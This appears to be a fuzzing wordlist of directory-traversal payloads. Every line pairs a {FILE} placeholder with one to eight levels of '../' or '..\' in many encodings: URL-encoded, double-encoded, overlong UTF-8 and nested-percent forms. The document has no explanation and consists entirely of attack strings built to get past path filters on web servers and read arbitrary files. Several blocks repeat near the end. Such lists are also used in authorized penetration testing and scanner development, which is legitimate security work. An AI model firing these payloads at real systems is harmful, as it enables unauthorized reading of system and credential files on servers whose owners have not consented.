%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/{FILE}&lt;br /&gt;
%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/{FILE}&lt;br /&gt;
%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/{FILE}&lt;br /&gt;
%25c0%25ae%25c0%25ae%25c0%25af{FILE}&lt;br /&gt;
%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af{FILE}&lt;br /&gt;
%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af{FILE}&lt;br /&gt;
%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af{FILE}&lt;br /&gt;
%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af{FILE}&lt;br /&gt;
%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af{FILE}&lt;br /&gt;
%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af{FILE}&lt;br /&gt;
%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af{FILE}&lt;br /&gt;
..%c1%9c{FILE}&lt;br /&gt;
..%c1%9c..%c1%9c{FILE}&lt;br /&gt;
..%c1%9c..%c1%9c..%c1%9c{FILE}&lt;br /&gt;
..%c1%9c..%c1%9c..%c1%9c..%c1%9c{FILE}&lt;br /&gt;
..%c1%9c..%c1%9c..%c1%9c..%c1%9c..%c1%9c{FILE}&lt;br /&gt;
..%c1%9c..%c1%9c..%c1%9c..%c1%9c..%c1%9c..%c1%9c{FILE}&lt;br /&gt;
..%c1%9c..%c1%9c..%c1%9c..%c1%9c..%c1%9c..%c1%9c..%c1%9c{FILE}&lt;br /&gt;
..%c1%9c..%c1%9c..%c1%9c..%c1%9c..%c1%9c..%c1%9c..%c1%9c..%c1%9c{FILE}&lt;br /&gt;
%c0%ae%c0%ae\{FILE}&lt;br /&gt;
%c0%ae%c0%ae\%c0%ae%c0%ae\{FILE}&lt;br /&gt;
%c0%ae%c0%ae\%c0%ae%c0%ae\%c0%ae%c0%ae\{FILE}&lt;br /&gt;
%c0%ae%c0%ae\%c0%ae%c0%ae\%c0%ae%c0%ae\%c0%ae%c0%ae\{FILE}&lt;br /&gt;
%c0%ae%c0%ae\%c0%ae%c0%ae\%c0%ae%c0%ae\%c0%ae%c0%ae\%c0%ae%c0%ae\{FILE}&lt;br /&gt;
%c0%ae%c0%ae\%c0%ae%c0%ae\%c0%ae%c0%ae\%c0%ae%c0%ae\%c0%ae%c0%ae\%c0%ae%c0%ae\{FILE}&lt;br /&gt;
%c0%ae%c0%ae\%c0%ae%c0%ae\%c0%ae%c0%ae\%c0%ae%c0%ae\%c0%ae%c0%ae\%c0%ae%c0%ae\%c0%ae%c0%ae\{FILE}&lt;br /&gt;
%c0%ae%c0%ae\%c0%ae%c0%ae\%c0%ae%c0%ae\%c0%ae%c0%ae\%c0%ae%c0%ae\%c0%ae%c0%ae\%c0%ae%c0%ae\%c0%ae%c0%ae\{FILE}&lt;br /&gt;
%c0%ae%c0%ae%c1%9c{FILE}&lt;br /&gt;
%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c{FILE}&lt;br /&gt;
%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c{FILE}&lt;br /&gt;
%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c{FILE}&lt;br /&gt;
%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c{FILE}&lt;br /&gt;
%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c{FILE}&lt;br /&gt;
%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c{FILE}&lt;br /&gt;
%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c{FILE}&lt;br /&gt;
..%25c1%259c{FILE}&lt;br /&gt;
..%25c1%259c..%25c1%259c{FILE}&lt;br /&gt;
..%25c1%259c..%25c1%259c..%25c1%259c{FILE}&lt;br /&gt;
..%25c1%259c..%25c1%259c..%25c1%259c..%25c1%259c{FILE}&lt;br /&gt;
..%25c1%259c..%25c1%259c..%25c1%259c..%25c1%259c..%25c1%259c{FILE}&lt;br /&gt;
..%25c1%259c..%25c1%259c..%25c1%259c..%25c1%259c..%25c1%259c..%25c1%259c{FILE}&lt;br /&gt;
..%25c1%259c..%25c1%259c..%25c1%259c..%25c1%259c..%25c1%259c..%25c1%259c..%25c1%259c{FILE}&lt;br /&gt;
..%25c1%259c..%25c1%259c..%25c1%259c..%25c1%259c..%25c1%259c..%25c1%259c..%25c1%259c..%25c1%259c{FILE}&lt;br /&gt;
%25c0%25ae%25c0%25ae\{FILE}&lt;br /&gt;
%25c0%25ae%25c0%25ae\%25c0%25ae%25c0%25ae\{FILE}&lt;br /&gt;
%25c0%25ae%25c0%25ae\%25c0%25ae%25c0%25ae\%25c0%25ae%25c0%25ae\{FILE}&lt;br /&gt;
%25c0%25ae%25c0%25ae\%25c0%25ae%25c0%25ae\%25c0%25ae%25c0%25ae\%25c0%25ae%25c0%25ae\{FILE}&lt;br /&gt;
%25c0%25ae%25c0%25ae\%25c0%25ae%25c0%25ae\%25c0%25ae%25c0%25ae\%25c0%25ae%25c0%25ae\%25c0%25ae%25c0%25ae\{FILE}&lt;br /&gt;
%25c0%25ae%25c0%25ae\%25c0%25ae%25c0%25ae\%25c0%25ae%25c0%25ae\%25c0%25ae%25c0%25ae\%25c0%25ae%25c0%25ae\%25c0%25ae%25c0%25ae\{FILE}&lt;br /&gt;
%25c0%25ae%25c0%25ae\%25c0%25ae%25c0%25ae\%25c0%25ae%25c0%25ae\%25c0%25ae%25c0%25ae\%25c0%25ae%25c0%25ae\%25c0%25ae%25c0%25ae\%25c0%25ae%25c0%25ae\{FILE}&lt;br /&gt;
%25c0%25ae%25c0%25ae\%25c0%25ae%25c0%25ae\%25c0%25ae%25c0%25ae\%25c0%25ae%25c0%25ae\%25c0%25ae%25c0%25ae\%25c0%25ae%25c0%25ae\%25c0%25ae%25c0%25ae\%25c0%25ae%25c0%25ae\{FILE}&lt;br /&gt;
%25c0%25ae%25c0%25ae%25c1%259c{FILE}&lt;br /&gt;
%25c0%25ae%25c0%25ae%25c1%259c%25c0%25ae%25c0%25ae%25c1%259c{FILE}&lt;br /&gt;
%25c0%25ae%25c0%25ae%25c1%259c%25c0%25ae%25c0%25ae%25c1%259c%25c0%25ae%25c0%25ae%25c1%259c{FILE}&lt;br /&gt;
%25c0%25ae%25c0%25ae%25c1%259c%25c0%25ae%25c0%25ae%25c1%259c%25c0%25ae%25c0%25ae%25c1%259c%25c0%25ae%25c0%25ae%25c1%259c{FILE}&lt;br /&gt;
%25c0%25ae%25c0%25ae%25c1%259c%25c0%25ae%25c0%25ae%25c1%259c%25c0%25ae%25c0%25ae%25c1%259c%25c0%25ae%25c0%25ae%25c1%259c%25c0%25ae%25c0%25ae%25c1%259c{FILE}&lt;br /&gt;
%25c0%25ae%25c0%25ae%25c1%259c%25c0%25ae%25c0%25ae%25c1%259c%25c0%25ae%25c0%25ae%25c1%259c%25c0%25ae%25c0%25ae%25c1%259c%25c0%25ae%25c0%25ae%25c1%259c%25c0%25ae%25c0%25ae%25c1%259c{FILE}&lt;br /&gt;
%25c0%25ae%25c0%25ae%25c1%259c%25c0%25ae%25c0%25ae%25c1%259c%25c0%25ae%25c0%25ae%25c1%259c%25c0%25ae%25c0%25ae%25c1%259c%25c0%25ae%25c0%25ae%25c1%259c%25c0%25ae%25c0%25ae%25c1%259c%25c0%25ae%25c0%25ae%25c1%259c{FILE}&lt;br /&gt;
%25c0%25ae%25c0%25ae%25c1%259c%25c0%25ae%25c0%25ae%25c1%259c%25c0%25ae%25c0%25ae%25c1%259c%25c0%25ae%25c0%25ae%25c1%259c%25c0%25ae%25c0%25ae%25c1%259c%25c0%25ae%25c0%25ae%25c1%259c%25c0%25ae%25c0%25ae%25c1%259c%25c0%25ae%25c0%25ae%25c1%259c{FILE}&lt;br /&gt;
..%%32%66{FILE}&lt;br /&gt;
..%%32%66..%%32%66{FILE}&lt;br /&gt;
..%%32%66..%%32%66..%%32%66{FILE}&lt;br /&gt;
..%%32%66..%%32%66..%%32%66..%%32%66{FILE}&lt;br /&gt;
..%%32%66..%%32%66..%%32%66..%%32%66..%%32%66{FILE}&lt;br /&gt;
..%%32%66..%%32%66..%%32%66..%%32%66..%%32%66..%%32%66{FILE}&lt;br /&gt;
..%%32%66..%%32%66..%%32%66..%%32%66..%%32%66..%%32%66..%%32%66{FILE}&lt;br /&gt;
..%%32%66..%%32%66..%%32%66..%%32%66..%%32%66..%%32%66..%%32%66..%%32%66{FILE}&lt;br /&gt;
%%32%65%%32%65/{FILE}&lt;br /&gt;
%%32%65%%32%65/%%32%65%%32%65/{FILE}&lt;br /&gt;
%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/{FILE}&lt;br /&gt;
%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/{FILE}&lt;br /&gt;
%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/{FILE}&lt;br /&gt;
%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/{FILE}&lt;br /&gt;
%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/{FILE}&lt;br /&gt;
%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/{FILE}&lt;br /&gt;
%%32%65%%32%65%%32%66{FILE}&lt;br /&gt;
%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66{FILE}&lt;br /&gt;
%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66{FILE}&lt;br /&gt;
%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66{FILE}&lt;br /&gt;
%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66{FILE}&lt;br /&gt;
%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66{FILE}&lt;br /&gt;
%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66{FILE}&lt;br /&gt;
%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66{FILE}&lt;br /&gt;
..%%35%63{FILE}&lt;br /&gt;
..%%35%63..%%35%63{FILE}&lt;br /&gt;
..%%35%63..%%35%63..%%35%63{FILE}&lt;br /&gt;
..%%35%63..%%35%63..%%35%63..%%35%63{FILE}&lt;br /&gt;
..%%35%63..%%35%63..%%35%63..%%35%63..%%35%63{FILE}&lt;br /&gt;
..%%35%63..%%35%63..%%35%63..%%35%63..%%35%63..%%35%63{FILE}&lt;br /&gt;
..%%35%63..%%35%63..%%35%63..%%35%63..%%35%63..%%35%63..%%35%63{FILE}&lt;br /&gt;
..%%35%63..%%35%63..%%35%63..%%35%63..%%35%63..%%35%63..%%35%63..%%35%63{FILE}&lt;br /&gt;
%%32%65%%32%65/{FILE}&lt;br /&gt;
%%32%65%%32%65/%%32%65%%32%65/{FILE}&lt;br /&gt;
%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/{FILE}&lt;br /&gt;
%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/{FILE}&lt;br /&gt;
%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/{FILE}&lt;br /&gt;
%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/{FILE}&lt;br /&gt;
%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/{FILE}&lt;br /&gt;
%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/{FILE}&lt;br /&gt;
%%32%65%%32%65%%35%63{FILE}&lt;br /&gt;
%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63{FILE}&lt;br /&gt;
%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63{FILE}&lt;br /&gt;
%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63{FILE}&lt;br /&gt;
%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63{FILE}&lt;br /&gt;
%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63{FILE}&lt;br /&gt;
%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63{FILE}&lt;br /&gt;
%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63{FILE}&lt;br /&gt;
../{FILE}&lt;br /&gt;
../../{FILE}&lt;br /&gt;
../../../{FILE}&lt;br /&gt;
../../../../{FILE}&lt;br /&gt;
../../../../../{FILE}&lt;br /&gt;
../../../../../../{FILE}&lt;br /&gt;
../../../../../../../{FILE}&lt;br /&gt;
../../../../../../../../{FILE}&lt;br /&gt;
..%2f{FILE}&lt;br /&gt;
..%2f..%2f{FILE}&lt;br /&gt;
..%2f..%2f..%2f{FILE}&lt;br /&gt;
..%2f..%2f..%2f..%2f{FILE}&lt;br /&gt;
..%2f..%2f..%2f..%2f..%2f{FILE}&lt;br /&gt;
..%2f..%2f..%2f..%2f..%2f..%2f{FILE}&lt;br /&gt;
..%2f..%2f..%2f..%2f..%2f..%2f..%2f{FILE}&lt;br /&gt;
..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f{FILE}&lt;br /&gt;
%2e%2e/{FILE}&lt;br /&gt;
%2e%2e/%2e%2e/{FILE}&lt;br /&gt;
%2e%2e/%2e%2e/%2e%2e/{FILE}&lt;br /&gt;
%2e%2e/%2e%2e/%2e%2e/%2e%2e/{FILE}&lt;br /&gt;
%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/{FILE}&lt;br /&gt;
%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/{FILE}&lt;br /&gt;
%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/{FILE}&lt;br /&gt;
%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/{FILE}&lt;br /&gt;
%2e%2e%2f{FILE}&lt;br /&gt;
%2e%2e%2f%2e%2e%2f{FILE}&lt;br /&gt;
%2e%2e%2f%2e%2e%2f%2e%2e%2f{FILE}&lt;br /&gt;
%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f{FILE}&lt;br /&gt;
%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f{FILE}&lt;br /&gt;
%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f{FILE}&lt;br /&gt;
%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f{FILE}&lt;br /&gt;
%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f{FILE}&lt;br /&gt;
..%252f{FILE}&lt;br /&gt;
..%252f..%252f{FILE}&lt;br /&gt;
..%252f..%252f..%252f{FILE}&lt;br /&gt;
..%252f..%252f..%252f..%252f{FILE}&lt;br /&gt;
..%252f..%252f..%252f..%252f..%252f{FILE}&lt;br /&gt;
..%252f..%252f..%252f..%252f..%252f..%252f{FILE}&lt;br /&gt;
..%252f..%252f..%252f..%252f..%252f..%252f..%252f{FILE}&lt;br /&gt;
..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f{FILE}&lt;br /&gt;
%252e%252e/{FILE}&lt;br /&gt;
%252e%252e/%252e%252e/{FILE}&lt;br /&gt;
%252e%252e/%252e%252e/%252e%252e/{FILE}&lt;br /&gt;
%252e%252e/%252e%252e/%252e%252e/%252e%252e/{FILE}&lt;br /&gt;
%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/{FILE}&lt;br /&gt;
%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/{FILE}&lt;br /&gt;
%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/{FILE}&lt;br /&gt;
%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/{FILE}&lt;br /&gt;
%252e%252e%252f{FILE}&lt;br /&gt;
%252e%252e%252f%252e%252e%252f{FILE}&lt;br /&gt;
%252e%252e%252f%252e%252e%252f%252e%252e%252f{FILE}&lt;br /&gt;
%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f{FILE}&lt;br /&gt;
%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f{FILE}&lt;br /&gt;
%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f{FILE}&lt;br /&gt;
%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f{FILE}&lt;br /&gt;
%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f{FILE}&lt;br /&gt;
..\{FILE}&lt;br /&gt;
..\..\{FILE}&lt;br /&gt;
..\..\..\{FILE}&lt;br /&gt;
..\..\..\..\{FILE}&lt;br /&gt;
..\..\..\..\..\{FILE}&lt;br /&gt;
..\..\..\..\..\..\{FILE}&lt;br /&gt;
..\..\..\..\..\..\..\{FILE}&lt;br /&gt;
..\..\..\..\..\..\..\..\{FILE}&lt;br /&gt;
..%5c{FILE}&lt;br /&gt;
..%5c..%5c{FILE}&lt;br /&gt;
..%5c..%5c..%5c{FILE}&lt;br /&gt;
..%5c..%5c..%5c..%5c{FILE}&lt;br /&gt;
..%5c..%5c..%5c..%5c..%5c{FILE}&lt;br /&gt;
..%5c..%5c..%5c..%5c..%5c..%5c{FILE}&lt;br /&gt;
..%5c..%5c..%5c..%5c..%5c..%5c..%5c{FILE}&lt;br /&gt;
..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c{FILE}&lt;br /&gt;
%2e%2e\{FILE}&lt;br /&gt;
%2e%2e\%2e%2e\{FILE}&lt;br /&gt;
%2e%2e\%2e%2e\%2e%2e\{FILE}&lt;br /&gt;
%2e%2e\%2e%2e\%2e%2e\%2e%2e\{FILE}&lt;br /&gt;
%2e%2e\%2e%2e\%2e%2e\%2e%2e\%2e%2e\{FILE}&lt;br /&gt;
%2e%2e\%2e%2e\%2e%2e\%2e%2e\%2e%2e\%2e%2e\{FILE}&lt;br /&gt;
%2e%2e\%2e%2e\%2e%2e\%2e%2e\%2e%2e\%2e%2e\%2e%2e\{FILE}&lt;br /&gt;
%2e%2e\%2e%2e\%2e%2e\%2e%2e\%2e%2e\%2e%2e\%2e%2e\%2e%2e\{FILE}&lt;br /&gt;
%2e%2e%5c{FILE}&lt;br /&gt;
%2e%2e%5c%2e%2e%5c{FILE}&lt;br /&gt;
%2e%2e%5c%2e%2e%5c%2e%2e%5c{FILE}&lt;br /&gt;
%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c{FILE}&lt;br /&gt;
%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c{FILE}&lt;br /&gt;
%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c{FILE}&lt;br /&gt;
%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c{FILE}&lt;br /&gt;
%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c{FILE}&lt;br /&gt;
..%255c{FILE}&lt;br /&gt;
..%255c..%255c{FILE}&lt;br /&gt;
..%255c..%255c..%255c{FILE}&lt;br /&gt;
..%255c..%255c..%255c..%255c{FILE}&lt;br /&gt;
..%255c..%255c..%255c..%255c..%255c{FILE}&lt;br /&gt;
..%255c..%255c..%255c..%255c..%255c..%255c{FILE}&lt;br /&gt;
..%255c..%255c..%255c..%255c..%255c..%255c..%255c{FILE}&lt;br /&gt;
..%255c..%255c..%255c..%255c..%255c..%255c..%255c..%255c{FILE}&lt;br /&gt;
%252e%252e\{FILE}&lt;br /&gt;
%252e%252e\%252e%252e\{FILE}&lt;br /&gt;
%252e%252e\%252e%252e\%252e%252e\{FILE}&lt;br /&gt;
%252e%252e\%252e%252e\%252e%252e\%252e%252e\{FILE}&lt;br /&gt;
%252e%252e\%252e%252e\%252e%252e\%252e%252e\%252e%252e\{FILE}&lt;br /&gt;
%252e%252e\%252e%252e\%252e%252e\%252e%252e\%252e%252e\%252e%252e\{FILE}&lt;br /&gt;
%252e%252e\%252e%252e\%252e%252e\%252e%252e\%252e%252e\%252e%252e\%252e%252e\{FILE}&lt;br /&gt;
%252e%252e\%252e%252e\%252e%252e\%252e%252e\%252e%252e\%252e%252e\%252e%252e\%252e%252e\{FILE}&lt;br /&gt;
%252e%252e%255c{FILE}&lt;br /&gt;
%252e%252e%255c%252e%252e%255c{FILE}&lt;br /&gt;
%252e%252e%255c%252e%252e%255c%252e%252e%255c{FILE}&lt;br /&gt;
%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c{FILE}&lt;br /&gt;
%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c{FILE}&lt;br /&gt;
%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c{FILE}&lt;br /&gt;
%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c{FILE}&lt;br /&gt;
%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c{FILE}&lt;br /&gt;
../{FILE}&lt;br /&gt;
../../{FILE}&lt;br /&gt;
../../../{FILE}&lt;br /&gt;
../../../../{FILE}&lt;br /&gt;
../../../../../{FILE}&lt;br /&gt;
../../../../../../{FILE}&lt;br /&gt;
../../../../../../../{FILE}&lt;br /&gt;
../../../../../../../../{FILE}&lt;br /&gt;
..%2f{FILE}&lt;br /&gt;
..%2f..%2f{FILE}&lt;br /&gt;
..%2f..%2f..%2f{FILE}&lt;br /&gt;
..%2f..%2f..%2f..%2f{FILE}&lt;br /&gt;
..%2f..%2f..%2f..%2f..%2f{FILE}&lt;br /&gt;
..%2f..%2f..%2f..%2f..%2f..%2f{FILE}&lt;br /&gt;
..%2f..%2f..%2f..%2f..%2f..%2f..%2f{FILE}&lt;br /&gt;
..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f{FILE}&lt;br /&gt;
%2e%2e/{FILE}&lt;br /&gt;
%2e%2e/%2e%2e/{FILE}&lt;br /&gt;
%2e%2e/%2e%2e/%2e%2e/{FILE}&lt;br /&gt;
%2e%2e/%2e%2e/%2e%2e/%2e%2e/{FILE}&lt;br /&gt;
%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/{FILE}&lt;br /&gt;
%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/{FILE}&lt;br /&gt;
%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/{FILE}&lt;br /&gt;
%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/{FILE}&lt;br /&gt;
%2e%2e%2f{FILE}&lt;br /&gt;
%2e%2e%2f%2e%2e%2f{FILE}&lt;br /&gt;
%2e%2e%2f%2e%2e%2f%2e%2e%2f{FILE}&lt;br /&gt;
%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f{FILE}&lt;br /&gt;
%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f{FILE}&lt;br /&gt;
%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f{FILE}&lt;br /&gt;
%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f{FILE}&lt;br /&gt;
%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f{FILE}&lt;br /&gt;
..%252f{FILE}&lt;br /&gt;
..%252f..%252f{FILE}&lt;br /&gt;
..%252f..%252f..%252f{FILE}&lt;br /&gt;
..%252f..%252f..%252f..%252f{FILE}&lt;br /&gt;
..%252f..%252f..%252f..%252f..%252f{FILE}&lt;br /&gt;
..%252f..%252f..%252f..%252f..%252f..%252f{FILE}&lt;br /&gt;
..%252f..%252f..%252f..%252f..%252f..%252f..%252f{FILE}&lt;br /&gt;
..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f{FILE}&lt;br /&gt;
%252e%252e/{FILE}&lt;br /&gt;
%252e%252e/%252e%252e/{FILE}&lt;br /&gt;
%252e%252e/%252e%252e/%252e%252e/{FILE}&lt;br /&gt;
%252e%252e/%252e%252e/%252e%252e/%252e%252e/{FILE}&lt;br /&gt;
%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/{FILE}&lt;br /&gt;
%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/{FILE}&lt;br /&gt;
%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/{FILE}&lt;br /&gt;
%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/{FILE}&lt;br /&gt;
